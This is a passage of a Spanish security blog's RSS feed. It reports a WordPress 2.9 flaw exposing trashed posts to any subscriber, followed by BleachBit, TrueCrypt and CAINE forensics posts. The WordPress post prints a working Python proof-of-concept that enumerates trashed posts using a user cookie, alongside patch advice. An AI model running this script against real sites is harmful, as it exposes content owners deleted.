href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;.</p><p
style="text-align: center;"><img
class="alignnone" title="Fallo en WordPress" src="http://img59.imageshack.us/img59/5996/wordpresstrash300x300.png" alt="wordpresstrash300x300 Pueden leer tu Basura" width="300" height="300" /></p><p
style="text-align: justify;">Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada &#8220;<a
href="http://www.youtube.com/watch?v=dFlBm2XGv4g">papelera</a>&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían a la &#8220;papelera de reciclaje&#8221; para <a
href="http://www.dragonjar.org/tag/prevenir" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Prevenir">prevenir</a> así que sean eliminados de forma accidental.</p><p
style="text-align: justify;">Lo que descubrió <a
href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la &#8220;papelera&#8221;, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos&#8230; cosa que <a
href="http://tmacuk.co.uk/?p=180">Mackenzie</a> pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra &#8220;papelera&#8221;.<span
id="more-3856"></span></p><blockquote><p>#/usr/bin/python<br
/> #<br
/> # WordPress &gt; 2.9 Failure to Restrict URL Access PoC<br
/> #<br
/> # This script iterates through the WP post ID&#8217;s as an authenticated and unauthenticated user.<br
/> # If the requests differ a &#8216;Trash&#8217; post has been found.<br
/> #<br
/> # You will need an authenticated user cookie of any priveledge to run this script.<br
/> #<br
/> # Example cookie:<br
/> # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8<br
/> #<br
/> # Will only work with WP URLs with the &#8216;/?p={int}&#8217; parameter. Would need to handle redirects (3xx) to handle all URL types.<br
/> #<br
/> #<br
/> # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)</p><p>import httplib</p><p># Declare vars<br
/> blogURL = &#8220;www.example.com&#8221;<br
/> userCookie = &#8220;enter_cookie_here&#8221;<br
/> postID = 0 #Leave at 0</p><p>conn = httplib.HTTPConnection(blogURL)<br
/> Headers = {&#8220;Cookie&#8221; : userCookie}</p><p>print<br
/> print &#8220;Target = http://&#8221; + blogURL + &#8220;/?p=&#8221; + str(postID)<br
/> print</p><p>while 1:</p><p># Start non authenticated enumeration</p><p>request = &#8216;/?p=&#8217; + str(postID)<br
/> conn.request(&#8220;GET&#8221;, request, &#8220;&#8221;)</p><p>try:<br
/> r1 = conn.getresponse()<br
/> except:<br
/> print &#8220;Connection error&#8221;</p><p>data1 = r1.read()</p><p># Start authenticated enumeration</p><p>conn.request(&#8220;GET&#8221;, request, None, Headers)</p><p>try:<br
/> r2 = conn.getresponse()<br
/> except:<br
/> print &#8220;Connection error&#8221;</p><p>data2 = r2.read()</p><p># Compare the HTML body reponses</p><p>if data1 != data2:<br
/> print &#8220;+ Found! http://&#8221; + blogURL + request<br
/> else:<br
/> print request</p><p>postID += 1</p><p>conn.close()</p></blockquote><p
style="text-align: justify;">Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que <a
href="http://wordpress.org/download/">actualicen su instalación de WordPress a la versión 2.9.2</a> que ya cuenta con un parche para este problema de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>.</p><p
style="text-align: justify;">Una vez más queda confirmado que la seguridad por &#8220;oscuridad&#8221;  no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.</p><p
style="text-align: justify;"><strong>PD.</strong> Lo que no entiendo es por que páginas como <a
href="http://www.daboweb.com/2010/02/16/wordpress-2-9-2-disponible/">DaboWeb</a> y <a
href="http://mangasverdes.es/2010/02/15/wordpress-2-9-2-nueva-actualizacion-urgente/">Mangas Verdes</a> hablan de este fallo y afirman que un posible atacante puede &#8220;<a
href="http://www.dragonjar.org/tag/eliminar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Eliminar">Eliminar</a> artículos de nuestro WordPress&#8221; ¿De donde habrán sacado esa <a
href="http://www.dragonjar.org/tag/informacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informacion">informacion</a>?&#8230;</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a
href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/101-libros-de-seguridad-informatica-gratis.xhtml" title="101 Libros de Seguridad Informática Gratis">101 Libros de Seguridad Informática Gratis</a></li><li><a
href="http://www.dragonjar.org/bugcon.xhtml" title="BugCON 2012">BugCON 2012</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml/feed</wfw:commentRss> <slash:comments>12</slash:comments> </item> <item><title>Como realizar un borrado seguro usando BleachBit</title><link>http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml</link> <comments>http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml#comments</comments> <pubDate>Sun, 31 Jan 2010 21:04:36 +0000</pubDate> <dc:creator>Epsilon</dc:creator> <category><![CDATA[COMOs]]></category> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Aplicacion]]></category> <category><![CDATA[aplicaciones]]></category> <category><![CDATA[Archivos]]></category> <category><![CDATA[bleachbit]]></category> <category><![CDATA[borrar archivos]]></category> <category><![CDATA[como borrar archivos]]></category> <category><![CDATA[Eliminar]]></category> <category><![CDATA[en archivos]]></category> <category><![CDATA[Herra]]></category> <category><![CDATA[Herramienta]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3625</guid> <description><![CDATA[BleachBit es una herramienta multiplataforma (tanto Windows como GNU/Linux) que nos permite realizar un borrado seguro evitando dejar algunos rastros. Cabe resaltar que aunque existan este tipo de herramientas, siempre la informática forense estará un paso adelante descubriendo hasta los mas mínimos detalles  de aquellos rastros que son imposibles de borrar. Sin embargo, con este [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://www.dragonjar.org/tag/bleachbit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con bleachbit">BleachBit</a> es una <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> multiplataforma (tanto <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> como <a
href="http://www.dragonjar.org/tag/gnulinux" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con GNU/Linux">GNU/Linux</a>) que nos permite realizar un borrado seguro evitando dejar algunos rastros. Cabe resaltar que aunque existan este tipo de herramientas, siempre la <a
href="http://www.dragonjar.org/tag/informatica-forense" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informática Forense">informática forense</a> estará un paso adelante descubriendo hasta los mas mínimos detalles  de aquellos rastros que son imposibles de borrar. Sin embargo, con este pequeño articulo pretendemos  explicar un poco mas a fondo esta herramienta, la cual es muy útil por que podemos borrar mucha información critica con solo un par de clicks.</p><p
style="text-align: center;"><img
class="alignnone" title="Borrado Seguro" src="http://img13.imageshack.us/img13/7571/borradof.jpg" alt="borradof Como realizar un borrado seguro usando BleachBit" width="190" height="246" /></p><p>La instalación es muy sencilla,  pueden <a
href="http://bleachbit.sourceforge.net/download">descargar el paquete</a> para su sistema operativo (si es GNU/Linux pueden descargar el paquete según su distribución), o si lo prefieren aquellos usuarios de debian y derivados pueden descargar la herramienta desde los repositorios:<span
id="more-3625"></span></p><blockquote><p><code>apt-get install bleachbit</code></p></blockquote><p>Ejecutamos nuestra <a
href="http://www.dragonjar.org/tag/aplicacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Aplicacion">aplicacion</a> ubicada en <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a>-herramientas del sistema-bleachbit y veremos algo como esto:</p><p
style="text-align: center;"><p
style="text-align: center;"><img
class="aligncenter" title="bleachbit" src="http://img59.imageshack.us/img59/6267/bleachbit.jpg" alt="bleachbit Como realizar un borrado seguro usando BleachBit" width="544" height="590" /></p><p
style="text-align: justify;">En esta pantalla pueden escoger los datos que desean <a
href="http://www.dragonjar.org/tag/eliminar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Eliminar">eliminar</a>,  hay datos de muchas aplicaciones como  amsn, apt, evolution entre otros,  después de haber seleccionado las opciones,  damos click en borrar y esperamos que la herramienta haga su trabajo. En el proceso pueden salir errores, generalmente son problemas de permisos para <a
href="http://www.dragonjar.org/tag/borrar-archivos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con borrar archivos">borrar archivos</a>, para evitar esto pueden entrar a bleachbit con permisos de root.</p><p
style="text-align: justify;">Por otra parte, bleachbit nos ofrece una exploración profunda, de esta forma la aplicacion escaneara todo el disco duro buscando archivos como:</p><ul><li>Thumbs.db</li><li>Copias de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a></li><li> archivos basura</li></ul><p
style="text-align: justify;">Hay que tener en cuenta que todos los archivos que borremos podrán ser recuperados, para hacer &#8220;irrecuperables&#8221; estos archivos debemos activar la casilla de sobre escribir archivos para ocultar su contenido, ubicada en el  menú de preferencias:</p><p
style="text-align: center;"><img
class="aligncenter" title="bleachbit" src="http://img4.imageshack.us/img4/1096/bleachbitpreferencias.jpg" alt="bleachbitpreferencias Como realizar un borrado seguro usando BleachBit" width="479" height="312" /></p><p
style="text-align: justify;">Ahora si lo que deseamos es triturar o eliminar algunos archivos específicos podemos hacerlo con esta aplicacion, debemos ir a archivo y escoger la opción de triturar archivos,  posteriormente buscamos los archivos a eliminar y eso es todo.</p><p
style="text-align: center;"><img
class="aligncenter" title="borrado seguro" src="http://img687.imageshack.us/img687/5034/triturararchivos.jpg" alt="triturararchivos Como realizar un borrado seguro usando BleachBit" width="537" height="547" /></p><p
style="text-align: justify;">Como pueden ver bleachbit es una herramienta  muy completa para borrar  no solamente la basura de tu sistema, sino también aquellos archivos que nadie puede ver.</p><p
style="text-align: justify;"><strong>Mas Información:</strong><br
/> <a
href="http://bleachbit.sourceforge.net/">Pagina Oficial de BleachBit</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml" title="Lista de tareas para revisar la seguridad en proyectos PHP">Lista de tareas para revisar la seguridad en proyectos PHP</a></li><li><a
href="http://www.dragonjar.org/como-detectar-y-prevenir-escalada-de-privilegios-en-gnulinux.xhtml" title="Como detectar  y prevenir escalada de privilegios en GNU/Linux">Como detectar  y prevenir escalada de privilegios en GNU/Linux</a></li><li><a
href="http://www.dragonjar.org/binging-footprinting-utilizando-bing.xhtml" title="Binging – Footprinting utilizando Bing">Binging – Footprinting utilizando Bing</a></li><li><a
href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/instalando-varios-sistemas-operativos-en-un-acer-one-parte-i.xhtml" title="Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I">Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml/feed</wfw:commentRss> <slash:comments>9</slash:comments> </item> <item><title>Manual de TrueCrypt</title><link>http://www.dragonjar.org/manual-de-truecrypt.xhtml</link> <comments>http://www.dragonjar.org/manual-de-truecrypt.xhtml#comments</comments> <pubDate>Sun, 17 May 2009 08:54:15 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Archivos]]></category> <category><![CDATA[Cifrado]]></category> <category><![CDATA[cifrados]]></category> <category><![CDATA[Cifrar]]></category> <category><![CDATA[disco]]></category> <category><![CDATA[Encripta]]></category> <category><![CDATA[encriptacion]]></category> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Guardar]]></category> <category><![CDATA[Herramienta]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Mac]]></category> <category><![CDATA[manual]]></category> <category><![CDATA[Proteger]]></category> <category><![CDATA[TrueCrypt]]></category> <category><![CDATA[Vista]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2270</guid> <description><![CDATA[TryeCrypt es una de las mejores soluciones disponibles en el mercado, para cifrar información importante, es gratuita y  multiplataforma (GNU/Linux, Mac OS X, Windows XP/2000/2003/Vista/Seven), es recomendada para proteger tu información sensible y así evitar que personas no autorizadas tengan acceso a ella. En la comunidad Seifreed ha realizado una serie de manuales muy graficos [...]]]></description> <content:encoded><![CDATA[<p>TryeCrypt es una de las <a
href="http://www.dragonjar.org/tag/mejores" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mejores">mejores</a> soluciones disponibles en el mercado, para <a
href="http://www.dragonjar.org/tag/cifrar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cifrar">cifrar</a> información importante, es gratuita y  multiplataforma (GNU/Linux, <a
href="http://www.dragonjar.org/tag/mac" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mac">Mac</a> OS X, Windows XP/2000/2003/Vista/Seven), es recomendada para proteger tu información sensible y así evitar que personas no autorizadas tengan acceso a ella.</p><p
style="text-align: center;"><img
src="http://img41.imageshack.us/img41/5467/truecrypt.jpg" alt="truecrypt Manual de TrueCrypt"  title="Manual de TrueCrypt" /></p><p>En la comunidad <a
class="bigusername" rel="nofollow" href="http://comunidad.dragonjar.org/members/seifreed.html">Seifreed</a> ha realizado una serie de manuales muy graficos y paso a paso de <a
href="http://www.dragonjar.org/tag/truecrypt" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con TrueCrypt">TrueCrypt</a>, que van desde su instalación hasta el uso de la herramienta, los dejo a continuación con la primera parte del <a
href="http://www.dragonjar.org/tag/manual" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con manual">manual</a>:<span
id="more-2270"></span></p><blockquote><p
style="text-align: justify;">Bueno voy hablaros de TrueCrypt un software que permite crear un volumen virtual cifrado en un archivo de forma rápida y transparente. Lo que hace TrueCrypt es crear un “volumen secreto”, que consiste en un <span
class="mw-redirect">archivo</span> que puede tener cualquier nombre y que TrueCrypt puede montar como una unidad de <a
href="http://www.dragonjar.org/tag/disco" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con disco">disco</a>, con su identificación respectiva, según el sistema operativo utilizado. El contenido de ese archivo tiene su propio <em>sistema de archivos</em> y todo lo necesario para operar como una unidad común de almacenamiento. Lo que se grabe en esa unidad virtual se cifra usando tecnología punta y con la potencia de cifrado que el usuario elija. Cuando se “monta” la unidad a través de TrueCrypt, se pide la contraseña que el usuario escogió al momento de crear este archivo secreto.</p><p><a
href="http://es.wikipedia.org/wiki/TrueCrypt" target="_blank">Fuente</a></p><p>Bien hare una guía sobre todas las funcionalidades de TrueCrypt que irá dividida en varias partes.</p><p>En la primera veremos crear un volumen cifrado con TrueCrypt y poder llevárnoslo a donde queramos.</p><p>Bajamos el software de la página principal</p><p><a
href="http://www.truecrypt.org/downloads" target="_blank">TrueCrypt</a></p><p>Y luego nos bajamos el paquete de idiomas para TrueCrypt</p><p><a
href="http://www.truecrypt.org/localizations" target="_blank">Idiomas</a></p><p>Para instalar TrueCrypt no tiene demasiada complicación es siguiente siguiente hasta finalizar aunque tendremos que escoger si lo queremos para PC o en un <a
href="http://www.dragonjar.org/tag/usb" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con USB">USB</a>:<img
class="aligncenter size-full wp-image-741" title="instalando_truecrypt" src="http://seifreed.files.wordpress.com/2009/05/instalando_truecrypt.jpg?w=500&amp;h=357" alt=" Manual de TrueCrypt" width="500" height="357" /></p><p>En el caso que sea para instalar en PC local ponemos install y en el caso de que sea para USB ponemos Extract</p><p>Para instalar el paquete de idiomas descomprimimos el paquete  de idiomas dentro de la carpeta</p><blockquote><p>C:\Archivos de Programa\TrueCrypt</p></blockquote><p>Una vez instalado lo iniciamos nos saldrá esto:</p><p><img
class="aligncenter size-full wp-image-742" title="creando_volumen" src="http://seifreed.files.wordpress.com/2009/05/creando_volumen.jpg?w=500&amp;h=430" alt=" Manual de TrueCrypt" width="500" height="430" /></p><p>Una vez nos salga esta pantallita le damos a Crear Volumen y entonces nos saldrá el tipo de volumen que queramos crear:</p><p><img
class="aligncenter size-full wp-image-743" title="escojiendo_opcion" src="http://seifreed.files.wordpress.com/2009/05/escojiendo_opcion.jpg?w=500&amp;h=305" alt=" Manual de TrueCrypt" width="500" height="305" /></p><p
style="text-align: justify;">Aqui podemos hacer tres cosas, :<br
/> <strong>Create and Encrypted file container: </strong>crear un “Baul” en donde dentro pondremos los archivos y cuando se monte dicho baul es decir se quiera mirar lo que hay dentro se montará como disco duro virtual.</p><p><strong>Encrypt a non-systempartition/Drive:</strong> Esta opción encriptará una partición o un disco duro externo.</p><p
style="text-align: justify;"><strong>Encriptar la partición del sistema o la unidad system:</strong> Esto cifrará la partición del sistema actual es decir normalmente la C:</p><p>Nosotros dejaremos la primera opción, y le daremos a siguiente.</p><p>Entonces nos saldrá algo así:</p><p><img
class="aligncenter size-full wp-image-744" title="tipo_de_volumen_a_crear" src="http://seifreed.files.wordpress.com/2009/05/tipo_de_volumen_a_crear.jpg?w=500&amp;h=308" alt=" Manual de TrueCrypt" width="500" height="308" /></p><p
style="text-align: justify;">Podemos crear un <strong>volumen comun</strong> que o un <strong>volumen escondido de Truecrypt</strong> la diferencia es que en el escondido creas un volumen truecrypt dentro de otro volumen truecrypt</p><p>Nosotros escojeremos la primera opción y le daremos a siguiente aquí nso saldrá algo así:</p><p><img
class="aligncenter size-full wp-image-745" title="creando_archivo_volumen" src="http://seifreed.files.wordpress.com/2009/05/creando_archivo_volumen.jpg?w=500&amp;h=304" alt=" Manual de TrueCrypt" width="500" height="304" /></p><p>Aqui seleccionaremos donde guardaremos el baul que contendrá nuestros archivos <a
href="http://www.dragonjar.org/tag/cifrados" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con cifrados">cifrados</a>, elejimos una ruta donde lo guardamos:</p><p><img
class="aligncenter size-full wp-image-746" title="guardando_el_volumen" src="http://seifreed.files.wordpress.com/2009/05/guardando_el_volumen.jpg?w=500&amp;h=303" alt=" Manual de TrueCrypt" width="500" height="303" /></p><p>Como veis ahi está en mi caso la ruta donde se guardarán los archivos, le damos a siguiente y nos encontraremos con el tipo de encriptacióna  cojer,</p><p><img
class="aligncenter size-full wp-image-747" title="cojiendo_tipo_de_encriptacion" src="http://seifreed.files.wordpress.com/2009/05/cojiendo_tipo_de_encriptacion.jpg?w=500&amp;h=302" alt=" Manual de TrueCrypt" width="500" height="302" /></p><p>Hay diferentes tipos de encriptación buscad por ahí las especificaciones de cada una y escojed la que mas se adeque a vuestras necesidades.</p><p>La cojemos y le damos a siguiente:</p><p><img
class="aligncenter size-full wp-image-748" title="cojiendo_tamaño" src="http://seifreed.files.wordpress.com/2009/05/cojiendo_tamano.jpg?w=500&amp;h=308" alt=" Manual de TrueCrypt" width="500" height="308" /></p><p>En mi caso  he cojido 50 Mb no necesito mas, a de quedar una cosa clara.<br
/> <strong>El baul creado por TrueCrypt una vez creado NO se le puede cambiar el tamaño</strong> asi que aseguraros de cojer bien el tamaño que necesiteis entonces le damos a siguiente:</p><p><img
class="aligncenter size-full wp-image-749" title="poniendo_contraseña" src="http://seifreed.files.wordpress.com/2009/05/poniendo_contrasena.jpg?w=500&amp;h=309" alt=" Manual de TrueCrypt" width="500" height="309" /></p><p>Aquí esta muy claro lo que hemos de hacer que es ponerle una contraseña al Volumen que crearemos, luego le damos a siguiente:</p><p><img
class="aligncenter size-full wp-image-750" title="encriptando_el_volumen" src="http://seifreed.files.wordpress.com/2009/05/encriptando_el_volumen.jpg?w=500&amp;h=310" alt=" Manual de TrueCrypt" width="500" height="310" /></p><p>Ahora en este paso estamos creando la encriptación del volumen, si movemos el raton encima de lo de <em>Pool Aletorio</em></p><p>haremos que la encriptación sea mejor, una vez que pensemos que ya estará bien encriptado le damos a Formatear</p><p><img
class="aligncenter size-full wp-image-751" title="combinando_encriptado" src="http://seifreed.files.wordpress.com/2009/05/combinando_encriptado.jpg?w=500&amp;h=306" alt=" Manual de TrueCrypt" width="500" height="306" /></p><p>Una vez que haya acabado nos saldrá este mensaje:</p><p><img
class="aligncenter size-full wp-image-752" title="volumen_creado" src="http://seifreed.files.wordpress.com/2009/05/volumen_creado.jpg?w=500&amp;h=305" alt=" Manual de TrueCrypt" width="500" height="305" /></p><p
style="text-align: justify;">Vale ahora una vez hayamos creado el volumen vamos a aprender a montar el volumen para su uso posterior, es decir poder guardar nuestros archivos en el baul cifrado. Abrimos true Crypt le damos a Seleccionatr Archivo cojemos el archivo cifrado que hayamos echo y le damos a montar, nos pedirá password pero le ponemos la que habíamos configurado previamente</p><p><img
class="aligncenter size-full wp-image-753" title="montando_volumen" src="http://seifreed.files.wordpress.com/2009/05/montando_volumen.jpg?w=500&amp;h=430" alt=" Manual de TrueCrypt" width="500" height="430" /></p><p
style="text-align: justify;">Una vez hayamos metido la contraseña nos montara una unidad de disco duro que será donde deberemos guardar nuestros archivos hemos de escojer una letra para montar la unidad:</p><p><img
class="aligncenter size-full wp-image-754" title="volumen_montado" src="http://seifreed.files.wordpress.com/2009/05/volumen_montado.jpg?w=500&amp;h=433" alt=" Manual de TrueCrypt" width="500" height="433" /></p><p>Como veis me la ha creado con la letra C:, vamos a MI PC  a comprobar si es verdad:</p><p><img
class="aligncenter size-full wp-image-755" title="particion_creada" src="http://seifreed.files.wordpress.com/2009/05/particion_creada.jpg?w=500&amp;h=161" alt=" Manual de TrueCrypt" width="500" height="161" /></p><p>Como veis ahí está la partición donde podremos nuestros datos cifrados</p><p>Y hasta aquí la primera parte de Usando TrueCrypt, para continuar con la segunda parte del articulo pueden <a
href="http://comunidad.dragonjar.org/proteccion-de-la-informacion/7470-usando-truecrypt-parte-ii.html">entrar al Foro de La Comunidad DragonJAR en el post <strong>Usando TrueCrypt-Parte II </strong></a></p></blockquote><p><strong>Mas Información:</strong><br
/> <a
href="http://www.truecrypt.org/">Pagina Oficial de TrueCrypt</a><br
/> <a
href="http://comunidad.dragonjar.org/proteccion-de-la-informacion/7470-usando-truecrypt-parte-ii.html">Segunda Parte del Manual</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a
href="http://www.dragonjar.org/truecrypt-cifra-tu-informacion-en-particiones-virtuales.xhtml" title="TrueCrypt &#8211; Cifra tu información en particiones virtuales">TrueCrypt &#8211; Cifra tu información en particiones virtuales</a></li><li><a
href="http://www.dragonjar.org/almacenamiento-online-de-10gb-gratis.xhtml" title="Almacenamiento Online de 10GB Gratis">Almacenamiento Online de 10GB Gratis</a></li><li><a
href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a
href="http://www.dragonjar.org/instalando-varios-sistemas-operativos-en-un-acer-one-parte-i.xhtml" title="Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I">Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I</a></li><li><a
href="http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml" title="Nueva Versión del CAINE, LiveCD para Informática Forense ">Nueva Versión del CAINE, LiveCD para Informática Forense </a></li><li><a
href="http://www.dragonjar.org/codeweavers-crossover-pro-gratis.xhtml" title="CodeWeavers CrossOver Pro y Games Gratis">CodeWeavers CrossOver Pro y Games Gratis</a></li><li><a
href="http://www.dragonjar.org/file-encryptorcom-encripta-y-desencripta-tus-datos-de-manera-online.xhtml" title="File-Encryptor.com, Encripta y desencripta tus datos de manera OnLine ">File-Encryptor.com, Encripta y desencripta tus datos de manera OnLine </a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/manual-de-truecrypt.xhtml/feed</wfw:commentRss> <slash:comments>7</slash:comments> </item> <item><title>Nueva Versión del CAINE, LiveCD para Informática Forense</title><link>http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml</link> <comments>http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml#comments</comments> <pubDate>Tue, 24 Feb 2009 05:51:37 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Informática Forense]]></category> <category><![CDATA[Analisis]]></category> <category><![CDATA[Cain]]></category> <category><![CDATA[Español]]></category> <category><![CDATA[Firefox]]></category> <category><![CDATA[helix]]></category> <category><![CDATA[Herramienta]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Informática]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[LiveCD]]></category> <category><![CDATA[manual]]></category> <category><![CDATA[Mejores]]></category> <category><![CDATA[Pruebas]]></category> <category><![CDATA[RAM]]></category> <category><![CDATA[Texto]]></category> <category><![CDATA[Ubuntu]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2034</guid> <description><![CDATA[Nueva Versión del CAINE, uno de los mejores LiveCD&#8217;s para Informática Forense, se diferencia de los demás livecd para forense (Helix FCCU, Deft, etc..) por su entorno de fácil uso para todo este tipo de herramientas y su interoperabilidad a través de diferentes herramientas forenses, ya que proporciona una interfaz gráfica homogénea que guía a [...]]]></description> <content:encoded><![CDATA[<p>Nueva Versión del CAINE, uno de los mejores  LiveCD&#8217;s para <a
href="http://www.dragonjar.org/tag/informatica" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informática">Informática</a> Forense, se diferencia de los demás livecd para forense (<a
href="http://www.dragonjar.org/tag/helix" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con helix">Helix</a> FCCU, Deft, etc..) por su entorno de fácil uso para todo este tipo de herramientas y su  interoperabilidad a través de diferentes herramientas forenses, ya que proporciona una interfaz gráfica homogénea que guía a los investigadores digitales durante la adquisición y el análisis de las <a
href="http://www.dragonjar.org/tag/pruebas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Pruebas">pruebas</a> electrónicas, <a
href="http://www.dragonjar.org/caine-livecd-linux-para-informatica-forense.xhtml">mas informacion del CAINE AQUI</a>.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img413.imageshack.us/img413/9739/caine.jpg" alt="caine Nueva Versión del CAINE, LiveCD para Informática Forense "  title="Nueva Versión del CAINE, LiveCD para Informática Forense " /></p><p
